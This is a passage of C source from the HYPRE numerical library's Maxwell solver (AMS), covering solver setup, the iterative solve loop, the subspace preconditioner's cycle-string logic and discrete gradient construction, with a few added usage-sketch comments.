(HYPRE_ParCSRMatrix)ams_data -> A_Pix,
0, 0);
if (!hypre_ParCSRMatrixCommPkg(ams_data -> Piy))
hypre_MatvecCommPkgCreate(ams_data -> Piy);
P_owned_col_starts = hypre_ParCSRMatrixOwnsColStarts(ams_data -> Piy);
hypre_BoomerAMGBuildCoarseOperator(ams_data -> Piy,
ams_data -> A,
ams_data -> Piy,
&ams_data -> A_Piy);
if (!P_owned_col_starts)
{
hypre_ParCSRMatrixOwnsRowStarts(ams_data -> A_Piy) = 0;
hypre_ParCSRMatrixOwnsColStarts(ams_data -> A_Piy) = 0;
}
/* Make sure that A_Piy has no zero rows (this can happen
for some kinds of boundary conditions with contact). */
hypre_ParCSRMatrixFixZeroRows(ams_data -> A_Piy);
HYPRE_BoomerAMGSetup(ams_data -> B_Piy,
(HYPRE_ParCSRMatrix)ams_data -> A_Piy,
0, 0);
if (ams_data -> Piz)
{
if (!hypre_ParCSRMatrixCommPkg(ams_data -> Piz))
hypre_MatvecCommPkgCreate(ams_data -> Piz);
P_owned_col_starts = hypre_ParCSRMatrixOwnsColStarts(ams_data -> Piz);
hypre_BoomerAMGBuildCoarseOperator(ams_data -> Piz,
ams_data -> A,
ams_data -> Piz,
&ams_data -> A_Piz);
if (!P_owned_col_starts)
{
hypre_ParCSRMatrixOwnsRowStarts(ams_data -> A_Piz) = 0;
hypre_ParCSRMatrixOwnsColStarts(ams_data -> A_Piz) = 0;
}
/* Make sure that A_Piz has no zero rows (this can happen
for some kinds of boundary conditions with contact). */
hypre_ParCSRMatrixFixZeroRows(ams_data -> A_Piz);
HYPRE_BoomerAMGSetup(ams_data -> B_Piz,
(HYPRE_ParCSRMatrix)ams_data -> A_Piz,
0, 0);
}
}
else
/* Create the AMG solver on the range of Pi^T */
{
HYPRE_BoomerAMGCreate(&ams_data -> B_Pi);
HYPRE_BoomerAMGSetCoarsenType(ams_data -> B_Pi, ams_data -> B_Pi_coarsen_type);
HYPRE_BoomerAMGSetAggNumLevels(ams_data -> B_Pi, ams_data -> B_Pi_agg_levels);
HYPRE_BoomerAMGSetRelaxType(ams_data -> B_Pi, ams_data -> B_Pi_relax_type);
HYPRE_BoomerAMGSetNumSweeps(ams_data -> B_Pi, 1);
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_Pi, 25);
HYPRE_BoomerAMGSetTol(ams_data -> B_Pi, 0.0);
HYPRE_BoomerAMGSetMaxIter(ams_data -> B_Pi, 1);
HYPRE_BoomerAMGSetStrongThreshold(ams_data -> B_Pi, ams_data -> B_Pi_theta);
HYPRE_BoomerAMGSetInterpType(ams_data -> B_Pi, ams_data -> B_Pi_interp_type);
HYPRE_BoomerAMGSetPMaxElmts(ams_data -> B_Pi, ams_data -> B_Pi_Pmax);
HYPRE_BoomerAMGSetMinCoarseSize(ams_data -> B_Pi, 2); /* don't coarsen to 0 */
/* Generally, don't use exact solve on the coarsest level (matrix may be singular) */
HYPRE_BoomerAMGSetCycleRelaxType(ams_data -> B_Pi, ams_data -> B_Pi_coarse_relax_type, 3);
if (ams_data -> cycle_type == 0)
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_Pi, 2);
/* If not given, construct the coarse space matrix by RAP and
notify BoomerAMG that this is a dim x dim block system. */
if (!ams_data -> A_Pi)
{
HYPRE_Int P_owned_col_starts = hypre_ParCSRMatrixOwnsColStarts(ams_data -> Pi);
if (!hypre_ParCSRMatrixCommPkg(ams_data -> Pi))
hypre_MatvecCommPkgCreate(ams_data -> Pi);
if (!hypre_ParCSRMatrixCommPkg(ams_data -> A))
hypre_MatvecCommPkgCreate(ams_data -> A);
if (ams_data -> cycle_type == 9)
{
/* Add a discrete divergence term to A before computing Pi^t A Pi */
{
hypre_ParCSRMatrix *Gt, *GGt, *ApGGt;
hypre_ParCSRMatrixTranspose(ams_data -> G, &Gt, 1);
hypre_ParCSRMatrixOwnsColStarts(Gt) = 0;
hypre_ParCSRMatrixOwnsRowStarts(Gt) = 0;
/* scale GGt by h^2 */
{
HYPRE_Real h2;
HYPRE_Int i, j, k, ne;
hypre_CSRMatrix *Gt_diag = hypre_ParCSRMatrixDiag(Gt);
HYPRE_Int Gt_num_rows = hypre_CSRMatrixNumRows(Gt_diag);
HYPRE_Int *Gt_diag_I = hypre_CSRMatrixI(Gt_diag);
HYPRE_Int *Gt_diag_J = hypre_CSRMatrixJ(Gt_diag);
HYPRE_Real *Gt_diag_data = hypre_CSRMatrixData(Gt_diag);
hypre_CSRMatrix *Gt_offd = hypre_ParCSRMatrixOffd(Gt);
HYPRE_Int *Gt_offd_I = hypre_CSRMatrixI(Gt_offd);
HYPRE_Real *Gt_offd_data = hypre_CSRMatrixData(Gt_offd);
HYPRE_Real *Gx_data = hypre_VectorData(hypre_ParVectorLocalVector(ams_data -> Gx));
HYPRE_Real *Gy_data = hypre_VectorData(hypre_ParVectorLocalVector(ams_data -> Gy));
HYPRE_Real *Gz_data = hypre_VectorData(hypre_ParVectorLocalVector(ams_data -> Gz));
for (i = 0; i < Gt_num_rows; i++)
{
/* determine the characteristic mesh size for vertex i */
h2 = 0.0;
ne = 0;
for (j = Gt_diag_I[i]; j < Gt_diag_I[i+1]; j++)
{
k = Gt_diag_J[j];
h2 += Gx_data[k]*Gx_data[k]+Gy_data[k]*Gy_data[k]+Gz_data[k]*Gz_data[k];
ne++;
}
if (ne != 0)
{
h2 /= ne;
for (j = Gt_diag_I[i]; j < Gt_diag_I[i+1]; j++)
Gt_diag_data[j] *= h2;
for (j = Gt_offd_I[i]; j < Gt_offd_I[i+1]; j++)
Gt_offd_data[j] *= h2;
}
}
}
/* we only needed Gx, Gy and Gz to compute the local mesh size */
if (input_info == 1)
{
hypre_ParVectorDestroy(ams_data -> Gx);
hypre_ParVectorDestroy(ams_data -> Gy);
if (ams_data -> dim == 3)
hypre_ParVectorDestroy(ams_data -> Gz);
}
GGt = hypre_ParMatmul(ams_data -> G, Gt);
hypre_ParCSRMatrixDestroy(Gt);
/* hypre_ParCSRMatrixAdd(GGt, A, &ams_data -> A); */
hypre_ParcsrAdd(1.0, GGt, 1.0, ams_data -> A, &ApGGt);
/*{
hypre_ParCSRMatrix *A = GGt;
hypre_ParCSRMatrix *B = ams_data -> A;
hypre_ParCSRMatrix **C_ptr = &ApGGt;
hypre_ParCSRMatrix *C;
hypre_CSRMatrix *A_local, *B_local, *C_local;
MPI_Comm comm = hypre_ParCSRMatrixComm(A);
HYPRE_BigInt global_num_rows = hypre_ParCSRMatrixGlobalNumRows(A);
HYPRE_BigInt global_num_cols = hypre_ParCSRMatrixGlobalNumCols(A);
HYPRE_BigInt *row_starts = hypre_ParCSRMatrixRowStarts(A);
HYPRE_BigInt *col_starts = hypre_ParCSRMatrixColStarts(A);
HYPRE_Int A_num_cols_offd = hypre_CSRMatrixNumCols(hypre_ParCSRMatrixOffd(A));
HYPRE_Int A_num_nonzeros_diag = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixDiag(A));
HYPRE_Int A_num_nonzeros_offd = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixOffd(A));
HYPRE_Int B_num_cols_offd = hypre_CSRMatrixNumCols(hypre_ParCSRMatrixOffd(B));
HYPRE_Int B_num_nonzeros_diag = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixDiag(B));
HYPRE_Int B_num_nonzeros_offd = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixOffd(B));
A_local = hypre_MergeDiagAndOffd(A);
B_local = hypre_MergeDiagAndOffd(B);
C_local = hypre_CSRMatrixBigAdd(A_local, B_local);
hypre_CSRMatrixBigJtoJ(C_local);
C = hypre_ParCSRMatrixCreate (comm,
global_num_rows,
global_num_cols,
row_starts,
col_starts,
A_num_cols_offd + B_num_cols_offd,
A_num_nonzeros_diag + B_num_nonzeros_diag,
A_num_nonzeros_offd + B_num_nonzeros_offd);
GenerateDiagAndOffd(C_local, C,
hypre_ParCSRMatrixFirstColDiag(A),
hypre_ParCSRMatrixLastColDiag(A));
hypre_ParCSRMatrixOwnsRowStarts(C) = 0;
hypre_ParCSRMatrixOwnsColStarts(C) = 0;
hypre_CSRMatrixDestroy(A_local);
hypre_CSRMatrixDestroy(B_local);
hypre_CSRMatrixDestroy(C_local);
*C_ptr = C;
}*/
hypre_ParCSRMatrixDestroy(GGt);
hypre_BoomerAMGBuildCoarseOperator(ams_data -> Pi,
ApGGt,
ams_data -> Pi,
&ams_data -> A_Pi);
}
}
else
{
hypre_BoomerAMGBuildCoarseOperator(ams_data -> Pi,
ams_data -> A,
ams_data -> Pi,
&ams_data -> A_Pi);
}
if (!P_owned_col_starts)
{
hypre_ParCSRMatrixOwnsRowStarts(ams_data -> A_Pi) = 0;
hypre_ParCSRMatrixOwnsColStarts(ams_data -> A_Pi) = 0;
}
ams_data -> owns_A_Pi = 1;
if (ams_data -> cycle_type != 20)
HYPRE_BoomerAMGSetNumFunctions(ams_data -> B_Pi, ams_data -> dim);
else
HYPRE_BoomerAMGSetNumFunctions(ams_data -> B_Pi, ams_data -> dim + 1);
/* HYPRE_BoomerAMGSetNodal(ams_data -> B_Pi, 1); */
}
/* Make sure that A_Pi has no zero rows (this can happen for
some kinds of boundary conditions with contact). */
hypre_ParCSRMatrixFixZeroRows(ams_data -> A_Pi);
HYPRE_BoomerAMGSetup(ams_data -> B_Pi,
(HYPRE_ParCSRMatrix)ams_data -> A_Pi,
0, 0);
}
/* Allocate temporary vectors */
ams_data -> r0 = hypre_ParVectorInRangeOf(ams_data -> A);
ams_data -> g0 = hypre_ParVectorInRangeOf(ams_data -> A);
if (ams_data -> A_G)
{
ams_data -> r1 = hypre_ParVectorInRangeOf(ams_data -> A_G);
ams_data -> g1 = hypre_ParVectorInRangeOf(ams_data -> A_G);
}
if (ams_data -> r1 == NULL && ams_data -> A_Pix)
{
ams_data -> r1 = hypre_ParVectorInRangeOf(ams_data -> A_Pix);
ams_data -> g1 = hypre_ParVectorInRangeOf(ams_data -> A_Pix);
}
if (ams_data -> Pi)
{
ams_data -> r2 = hypre_ParVectorInDomainOf(ams_data -> Pi);
ams_data -> g2 = hypre_ParVectorInDomainOf(ams_data -> Pi);
}
return hypre_error_flag;
}
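/*--------------------------------------------------------------------------
 * EXAMPLE (editorial sketch, not part of the library). The call order the
 * comment above prescribes, with hypothetical objects A, b, x, G and
 * coordinate vectors xv, yv, zv:
 *
 *    void *ams = hypre_AMSCreate();
 *    hypre_AMSSetDiscreteGradient(ams, G);
 *    hypre_AMSSetCoordinateVectors(ams, xv, yv, zv);
 *    hypre_AMSSetup(ams, A, b, x);
 *    hypre_AMSSolve(ams, A, b, x);
 *--------------------------------------------------------------------------*/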
/*--------------------------------------------------------------------------
* hypre_AMSSolve
*
* Solve the system A x = b.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSolve(void *solver,
hypre_ParCSRMatrix *A,
hypre_ParVector *b,
hypre_ParVector *x)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
HYPRE_Int i, my_id = -1;
HYPRE_Real r0_norm, r_norm, b_norm, relative_resid = 0, old_resid;
char cycle[30];
hypre_ParCSRMatrix *Ai[5], *Pi[5];
HYPRE_Solver Bi[5];
HYPRE_PtrToSolverFcn HBi[5];
hypre_ParVector *ri[5], *gi[5];
hypre_ParVector *z = NULL;
Ai[0] = ams_data -> A_G; Pi[0] = ams_data -> G;
Ai[1] = ams_data -> A_Pi; Pi[1] = ams_data -> Pi;
Ai[2] = ams_data -> A_Pix; Pi[2] = ams_data -> Pix;
Ai[3] = ams_data -> A_Piy; Pi[3] = ams_data -> Piy;
Ai[4] = ams_data -> A_Piz; Pi[4] = ams_data -> Piz;
Bi[0] = ams_data -> B_G; HBi[0] = (HYPRE_PtrToSolverFcn) hypre_BoomerAMGSolve;
Bi[1] = ams_data -> B_Pi; HBi[1] = (HYPRE_PtrToSolverFcn) hypre_BoomerAMGBlockSolve;
Bi[2] = ams_data -> B_Pix; HBi[2] = (HYPRE_PtrToSolverFcn) hypre_BoomerAMGSolve;
Bi[3] = ams_data -> B_Piy; HBi[3] = (HYPRE_PtrToSolverFcn) hypre_BoomerAMGSolve;
Bi[4] = ams_data -> B_Piz; HBi[4] = (HYPRE_PtrToSolverFcn) hypre_BoomerAMGSolve;
ri[0] = ams_data -> r1; gi[0] = ams_data -> g1;
ri[1] = ams_data -> r2; gi[1] = ams_data -> g2;
ri[2] = ams_data -> r1; gi[2] = ams_data -> g1;
ri[3] = ams_data -> r1; gi[3] = ams_data -> g1;
ri[4] = ams_data -> r1; gi[4] = ams_data -> g1;
/* may need to create an additional temporary vector for relaxation */
if (hypre_NumThreads() > 1 || ams_data -> A_relax_type == 16)
{
z = hypre_ParVectorCreate(hypre_ParCSRMatrixComm(A),
hypre_ParCSRMatrixGlobalNumRows(A),
hypre_ParCSRMatrixRowStarts(A));
hypre_ParVectorInitialize(z);
hypre_ParVectorSetPartitioningOwner(z,0);
}
if (ams_data -> print_level > 0)
hypre_MPI_Comm_rank(hypre_ParCSRMatrixComm(A), &my_id);
/* Compatible subspace projection for problems with zero-conductivity regions.
Note that this modifies the input (r.h.s.) vector b! */
if ( (ams_data -> B_G0) &&
(++ams_data->solve_counter % ( ams_data -> projection_frequency ) == 0) )
{
/* hypre_printf("Projecting onto the compatible subspace...\n"); */
hypre_AMSProjectOutGradients(ams_data, b);
}
if (ams_data -> beta_is_zero)
{
switch (ams_data -> cycle_type)
{
case 0:
hypre_sprintf(cycle,"%s","0");
break;
case 1:
case 3:
case 5:
case 7:
default:
hypre_sprintf(cycle,"%s","020");
break;
case 2:
case 4:
case 6:
case 8:
hypre_sprintf(cycle,"%s","(0+2)");
break;
case 11:
case 13:
hypre_sprintf(cycle,"%s","0345430");
break;
case 12:
hypre_sprintf(cycle,"%s","(0+3+4+5)");
break;
case 14:
hypre_sprintf(cycle,"%s","0(+3+4+5)0");
break;
}
}
else
{
switch (ams_data -> cycle_type)
{
case 0:
hypre_sprintf(cycle,"%s","010");
break;
case 1:
default:
hypre_sprintf(cycle,"%s","01210");
break;
case 2:
hypre_sprintf(cycle,"%s","(0+1+2)");
break;
case 3:
hypre_sprintf(cycle,"%s","02120");
break;
case 4:
hypre_sprintf(cycle,"%s","(010+2)");
break;
case 5:
hypre_sprintf(cycle,"%s","0102010");
break;
case 6:
hypre_sprintf(cycle,"%s","(020+1)");
break;
case 7:
hypre_sprintf(cycle,"%s","0201020");
break;
case 8:
hypre_sprintf(cycle,"%s","0(+1+2)0");
break;
case 9:
hypre_sprintf(cycle,"%s","01210");
break;
case 11:
hypre_sprintf(cycle,"%s","013454310");
break;
case 12:
hypre_sprintf(cycle,"%s","(0+1+3+4+5)");
break;
case 13:
hypre_sprintf(cycle,"%s","034515430");
break;
case 14:
hypre_sprintf(cycle,"%s","01(+3+4+5)10");
break;
case 20:
hypre_sprintf(cycle,"%s","020");
break;
}
}
for (i = 0; i < ams_data -> maxit; i++)
{
/* Compute initial residual norms */
if (ams_data -> maxit > 1 && i == 0)
{
hypre_ParVectorCopy(b, ams_data -> r0);
hypre_ParCSRMatrixMatvec(-1.0, ams_data -> A, x, 1.0, ams_data -> r0);
r_norm = sqrt(hypre_ParVectorInnerProd(ams_data -> r0,ams_data -> r0));
r0_norm = r_norm;
b_norm = sqrt(hypre_ParVectorInnerProd(b, b));
if (b_norm)
relative_resid = r_norm / b_norm;
else
relative_resid = r_norm;
if (my_id == 0 && ams_data -> print_level > 0)
{
hypre_printf(" relative\n");
hypre_printf(" residual factor residual\n");
hypre_printf(" -------- ------ --------\n");
hypre_printf(" Initial %e %e\n",
r_norm, relative_resid);
}
}
/* Apply the preconditioner */
hypre_ParCSRSubspacePrec(ams_data -> A,
ams_data -> A_relax_type,
ams_data -> A_relax_times,
ams_data -> A_l1_norms ? hypre_VectorData(ams_data -> A_l1_norms) : NULL,
ams_data -> A_relax_weight,
ams_data -> A_omega,
ams_data -> A_max_eig_est,
ams_data -> A_min_eig_est,
ams_data -> A_cheby_order,
ams_data -> A_cheby_fraction,
Ai, Bi, HBi, Pi, ri, gi,
b, x,
ams_data -> r0,
ams_data -> g0,
cycle,
z);
/* Compute new residual norms */
if (ams_data -> maxit > 1)
{
old_resid = r_norm;
hypre_ParVectorCopy(b, ams_data -> r0);
hypre_ParCSRMatrixMatvec(-1.0, ams_data -> A, x, 1.0, ams_data -> r0);
r_norm = sqrt(hypre_ParVectorInnerProd(ams_data -> r0,ams_data -> r0));
if (b_norm)
relative_resid = r_norm / b_norm;
else
relative_resid = r_norm;
if (my_id == 0 && ams_data -> print_level > 0)
hypre_printf(" Cycle %2d %e %f %e \n",
i+1, r_norm, r_norm / old_resid, relative_resid);
}
if (relative_resid < ams_data -> tol)
{
i++;
break;
}
}
if (my_id == 0 && ams_data -> print_level > 0 && ams_data -> maxit > 1)
hypre_printf("\n\n Average Convergence Factor = %f\n\n",
pow((r_norm/r0_norm),(1.0/(HYPRE_Real) i)));
ams_data -> num_iterations = i;
ams_data -> rel_resid_norm = relative_resid;
if (ams_data -> num_iterations == ams_data -> maxit && ams_data -> tol > 0.0)
hypre_error(HYPRE_ERROR_CONV);
if (z)
hypre_ParVectorDestroy(z);
return hypre_error_flag;
}
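/*--------------------------------------------------------------------------
 * EXAMPLE (editorial sketch, not part of the library). Users normally
 * reach this routine through the public wrappers, e.g. as a PCG
 * preconditioner (names follow HYPRE's public headers; hedged sketch):
 *
 *    HYPRE_Solver pcg, ams;
 *    HYPRE_ParCSRPCGCreate(comm, &pcg);
 *    HYPRE_AMSCreate(&ams);
 *    // ... AMS setters as illustrated earlier ...
 *    HYPRE_PCGSetPrecond(pcg, (HYPRE_PtrToSolverFcn) HYPRE_AMSSolve,
 *                        (HYPRE_PtrToSolverFcn) HYPRE_AMSSetup, ams);
 *--------------------------------------------------------------------------*/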
/*--------------------------------------------------------------------------
* hypre_ParCSRSubspacePrec
*
* General subspace preconditioner for A0 y = x, based on ParCSR storage.
*
* P[i] and A[i] are the interpolation and coarse grid matrices for
* the (i+1)'th subspace. B[i] is an AMG solver for A[i]. r[i] and g[i]
* are temporary vectors. A0_* are the fine grid smoothing parameters.
*
* The default mode is multiplicative, '+' changes the next correction
* to additive, based on residual computed at '('.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_ParCSRSubspacePrec(/* fine space matrix */
hypre_ParCSRMatrix *A0,
/* relaxation parameters */
HYPRE_Int A0_relax_type,
HYPRE_Int A0_relax_times,
HYPRE_Real *A0_l1_norms,
HYPRE_Real A0_relax_weight,
HYPRE_Real A0_omega,
HYPRE_Real A0_max_eig_est,
HYPRE_Real A0_min_eig_est,
HYPRE_Int A0_cheby_order,
HYPRE_Real A0_cheby_fraction,
/* subspace matrices */
hypre_ParCSRMatrix **A,
/* subspace preconditioners */
HYPRE_Solver *B,
/* hypre solver functions for B */
HYPRE_PtrToSolverFcn *HB,
/* subspace interpolations */
hypre_ParCSRMatrix **P,
/* temporary subspace vectors */
hypre_ParVector **r,
hypre_ParVector **g,
/* right-hand side */
hypre_ParVector *x,
/* current approximation */
hypre_ParVector *y,
/* current residual */
hypre_ParVector *r0,
/* temporary vector */
hypre_ParVector *g0,
char *cycle,
/* temporary vector */
hypre_ParVector *z)
{
char *op;
HYPRE_Int use_saved_residual = 0;
for (op = cycle; *op != '\0'; op++)
{
/* do nothing */
if (*op == ')')
continue;
/* compute the residual: r = x - Ay */
else if (*op == '(')
{
hypre_ParVectorCopy(x,r0);
hypre_ParCSRMatrixMatvec(-1.0, A0, y, 1.0, r0);
}
/* switch to additive correction */
else if (*op == '+')
{
use_saved_residual = 1;
continue;
}
/* smooth: y += S (x - Ay) */
else if (*op == '0')
{
hypre_ParCSRRelax(A0, x,
A0_relax_type,
A0_relax_times,
A0_l1_norms,
A0_relax_weight,
A0_omega,
A0_max_eig_est,
A0_min_eig_est,
A0_cheby_order,
A0_cheby_fraction,
y, g0, z);
}
/* subspace correction: y += P B^{-1} P^t r */
else
{
HYPRE_Int i = *op - '1';
if (i < 0)
hypre_error_in_arg(16);
/* skip empty subspaces */
if (!A[i]) continue;
/* compute the residual? */
if (use_saved_residual)
{
use_saved_residual = 0;
hypre_ParCSRMatrixMatvecT(1.0, P[i], r0, 0.0, r[i]);
}
else
{
hypre_ParVectorCopy(x,g0);
hypre_ParCSRMatrixMatvec(-1.0, A0, y, 1.0, g0);
hypre_ParCSRMatrixMatvecT(1.0, P[i], g0, 0.0, r[i]);
}
hypre_ParVectorSetConstantValues(g[i], 0.0);
(*HB[i]) (B[i], (HYPRE_Matrix)A[i],
(HYPRE_Vector)r[i], (HYPRE_Vector)g[i]);
hypre_ParCSRMatrixMatvec(1.0, P[i], g[i], 0.0, g0);
hypre_ParVectorAxpy(1.0, g0, y);
}
}
return hypre_error_flag;
}
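/*--------------------------------------------------------------------------
 * EXAMPLE (editorial sketch, not part of the library). Reading a cycle
 * string: "01210" means smooth on A0, correct in subspace 1, correct in
 * subspace 2, correct in subspace 1 again, then smooth on A0. With '('
 * the residual is saved, and '+' makes the next correction additive, so
 * "0(+1+2)0" smooths, saves the residual, applies the subspace 1 and 2
 * corrections to that same saved residual, and smooths again.
 *--------------------------------------------------------------------------*/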
/*--------------------------------------------------------------------------
* hypre_AMSGetNumIterations
*
* Get the number of AMS iterations.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSGetNumIterations(void *solver,
HYPRE_Int *num_iterations)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
*num_iterations = ams_data -> num_iterations;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSGetFinalRelativeResidualNorm
*
* Get the final relative residual norm in AMS.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSGetFinalRelativeResidualNorm(void *solver,
HYPRE_Real *rel_resid_norm)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
*rel_resid_norm = ams_data -> rel_resid_norm;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSProjectOutGradients
*
* For problems with zero-conductivity regions, project the vector onto the
 * compatible subspace: x = (I - G0 (G0^T G0)^{-1} G0^T) x, where G0 is the
* discrete gradient restricted to the interior nodes of the regions with
* zero conductivity. This ensures that x is orthogonal to the gradients in
* the range of G0.
*
* This function is typically called after the solution iteration is complete,
* in order to facilitate the visualization of the computed field. Without it
* the values in the zero-conductivity regions contain kernel components.
*--------------------------------------------------------------------------*/
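/* Hypothetical usage sketch (editorial addition; 'ams', 'A', 'b' and 'x' are
 * assumed to be an AMS solver object and the system being solved): strip the
 * kernel components from the computed field before visualization:
 *
 *   HYPRE_AMSSolve(ams, (HYPRE_ParCSRMatrix) A, (HYPRE_ParVector) b,
 *                  (HYPRE_ParVector) x);
 *   hypre_AMSProjectOutGradients(ams, x);
 */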
HYPRE_Int hypre_AMSProjectOutGradients(void *solver,
hypre_ParVector *x)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
if (ams_data -> B_G0)
{
hypre_ParCSRMatrixMatvecT(1.0, ams_data -> G0, x, 0.0, ams_data -> r1);
hypre_ParVectorSetConstantValues(ams_data -> g1, 0.0);
hypre_BoomerAMGSolve(ams_data -> B_G0, ams_data -> A_G0, ams_data -> r1, ams_data -> g1);
hypre_ParCSRMatrixMatvec(1.0, ams_data -> G0, ams_data -> g1, 0.0, ams_data -> g0);
hypre_ParVectorAxpy(-1.0, ams_data -> g0, x);
}
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSConstructDiscreteGradient
*
* Construct and return the lowest-order discrete gradient matrix G, based on:
 * - a matrix on the edges (e.g. the stiffness matrix A)
* - a vector on the vertices (e.g. the x coordinates)
* - the array edge_vertex, which lists the global indexes of the
* vertices of the local edges.
*
* We assume that edge_vertex lists the edge vertices consecutively,
 * and that the orientation of all edges is consistent. More specifically:
* If edge_orientation = 1, the edges are already oriented.
* If edge_orientation = 2, the orientation of edge i depends only on the
* sign of edge_vertex[2*i+1] - edge_vertex[2*i].
*--------------------------------------------------------------------------*/
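/* Worked example (editorial addition, not from the original sources): for two
 * local edges e0 = (v5 -> v2) and e1 = (v2 -> v7) stored as
 *   edge_vertex = { 5, 2, 2, 7 }
 * edge_orientation == 2 gives row e0 the entries (+1 at v5, -1 at v2),
 * since 5 > 2, and row e1 the entries (-1 at v2, +1 at v7), since 2 < 7.
 */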
HYPRE_Int hypre_AMSConstructDiscreteGradient(hypre_ParCSRMatrix *A,
hypre_ParVector *x_coord,
HYPRE_BigInt *edge_vertex,
HYPRE_Int edge_orientation,
hypre_ParCSRMatrix **G_ptr)
{
hypre_ParCSRMatrix *G;
HYPRE_Int nedges;
nedges = hypre_ParCSRMatrixNumRows(A);
/* Construct the local part of G based on edge_vertex and the edge
and vertex partitionings from A and x_coord */
{
HYPRE_Int i, *I = hypre_CTAlloc(HYPRE_Int, nedges+1, HYPRE_MEMORY_HOST);
HYPRE_Int part_size;
HYPRE_BigInt *row_starts, *col_starts;
HYPRE_Real *data = hypre_CTAlloc(HYPRE_Real, 2*nedges, HYPRE_MEMORY_HOST);
hypre_CSRMatrix *local = hypre_CSRMatrixCreate (nedges,
hypre_ParVectorGlobalSize(x_coord),
2*nedges);
for (i = 0; i <= nedges; i++)
I[i] = 2*i;
if (edge_orientation == 1)
{
/* Assume that the edges are already oriented */
for (i = 0; i < 2*nedges; i+=2)
{
data[i] = -1.0;
data[i+1] = 1.0;
}
}
else if (edge_orientation == 2)
{
/* Assume that the edge orientation is based on the vertex indexes */
for (i = 0; i < 2*nedges; i+=2)
{
if (edge_vertex[i] < edge_vertex[i+1])
{
data[i] = -1.0;
data[i+1] = 1.0;
}
else
{
data[i] = 1.0;
data[i+1] = -1.0;
}
}
}
else
{
hypre_error_in_arg(4);
}
hypre_CSRMatrixI(local) = I;
hypre_CSRMatrixBigJ(local) = edge_vertex;
hypre_CSRMatrixData(local) = data;
hypre_CSRMatrixRownnz(local) = NULL;
hypre_CSRMatrixOwnsData(local) = 1;
hypre_CSRMatrixNumRownnz(local) = nedges;
/* Copy partitioning from A and x_coord (previously they were re-used) */
part_size = 2;
row_starts = hypre_TAlloc(HYPRE_BigInt, part_size, HYPRE_MEMORY_HOST);
col_starts = hypre_TAlloc(HYPRE_BigInt, part_size, HYPRE_MEMORY_HOST);
for (i = 0; i < part_size; i++)
{
row_starts[i] = hypre_ParCSRMatrixRowStarts(A)[i];
col_starts[i] = hypre_ParVectorPartitioning(x_coord)[i];
}
/* Generate the discrete gradient matrix */
G = hypre_ParCSRMatrixCreate(hypre_ParCSRMatrixComm(A),
hypre_ParCSRMatrixGlobalNumRows(A),
hypre_ParVectorGlobalSize(x_coord),
row_starts, col_starts, 0, 0, 0);
hypre_ParCSRMatrixOwnsRowStarts(G) = 1;
hypre_ParCSRMatrixOwnsColStarts(G) = 1;
hypre_CSRMatrixBigJtoJ(local);
GenerateDiagAndOffd(local, G,
hypre_ParVectorFirstIndex(x_coord),
hypre_ParVectorLastIndex(x_coord));
/* Account for empty rows in G. These may appear when A includes only
the interior (non-Dirichlet b.c.) edges. */
{
hypre_CSRMatrix *G_diag = hypre_ParCSRMatrixDiag(G);
         hypre_CSRMatrixNumCols(G_diag) = hypre_VectorSize(hypre_ParVectorLocalVector(x_coord));
}
/* Free the local matrix */
hypre_CSRMatrixDestroy(local);
}
*G_ptr = G;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSFEISetup
*
* Construct an AMS solver object based on the following data:
*
* A - the edge element stiffness matrix
* num_vert - number of vertices (nodes) in the processor
* num_local_vert - number of vertices owned by the processor
* vert_number - global indexes of the vertices in the processor
* vert_coord - coordinates of the vertices in the processor
* num_edges - number of edges owned by the processor
* edge_vertex - the vertices of the edges owned by the processor.
* Vertices are in local numbering (the same as in
* vert_number), and edge orientation is always from
* the first to the second vertex.
*
* Here we distinguish between vertices that belong to elements in the
* current processor, and the subset of these vertices that is owned by
* the processor.
*
* This function is written specifically for input from the FEI and should
* be called before hypre_AMSSetup().
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSFEISetup(void *solver,
hypre_ParCSRMatrix *A,
hypre_ParVector *b,
hypre_ParVector *x,
HYPRE_Int num_vert,
HYPRE_Int num_local_vert,
HYPRE_BigInt *vert_number,
HYPRE_Real *vert_coord,
HYPRE_Int num_edges,
HYPRE_BigInt *edge_vertex)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
HYPRE_Int i, j;
hypre_ParCSRMatrix *G;
hypre_ParVector *x_coord, *y_coord, *z_coord;
HYPRE_Real *x_data, *y_data, *z_data;
MPI_Comm comm = hypre_ParCSRMatrixComm(A);
HYPRE_BigInt *vert_part, num_global_vert;
HYPRE_BigInt vert_start, vert_end;
HYPRE_BigInt big_local_vert = (HYPRE_BigInt) num_local_vert;
/* Find the processor partitioning of the vertices */
vert_part = hypre_TAlloc(HYPRE_BigInt, 2, HYPRE_MEMORY_HOST);
hypre_MPI_Scan(&big_local_vert, &vert_part[1], 1, HYPRE_MPI_BIG_INT, hypre_MPI_SUM, comm);
vert_part[0] = vert_part[1] - big_local_vert;
hypre_MPI_Allreduce(&big_local_vert, &num_global_vert, 1, HYPRE_MPI_BIG_INT, hypre_MPI_SUM, comm);
/* Construct hypre parallel vectors for the vertex coordinates */
x_coord = hypre_ParVectorCreate(comm, num_global_vert, vert_part);
hypre_ParVectorInitialize(x_coord);
hypre_ParVectorOwnsData(x_coord) = 1;
hypre_ParVectorOwnsPartitioning(x_coord) = 0;
x_data = hypre_VectorData(hypre_ParVectorLocalVector(x_coord));
y_coord = hypre_ParVectorCreate(comm, num_global_vert, vert_part);
hypre_ParVectorInitialize(y_coord);
hypre_ParVectorOwnsData(y_coord) = 1;
